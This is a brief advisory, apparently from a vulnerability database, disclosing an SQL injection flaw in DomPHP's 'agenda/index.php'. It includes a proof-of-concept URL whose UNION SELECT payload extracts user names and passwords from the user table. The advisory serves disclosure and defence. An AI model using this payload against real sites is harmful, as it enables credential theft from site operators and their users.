DomPHP 'agenda/index.php' SQL Injection Vulnerability

DomPHP 'agenda/index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof of concept is available:

http://www.example.com/agenda/index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]/*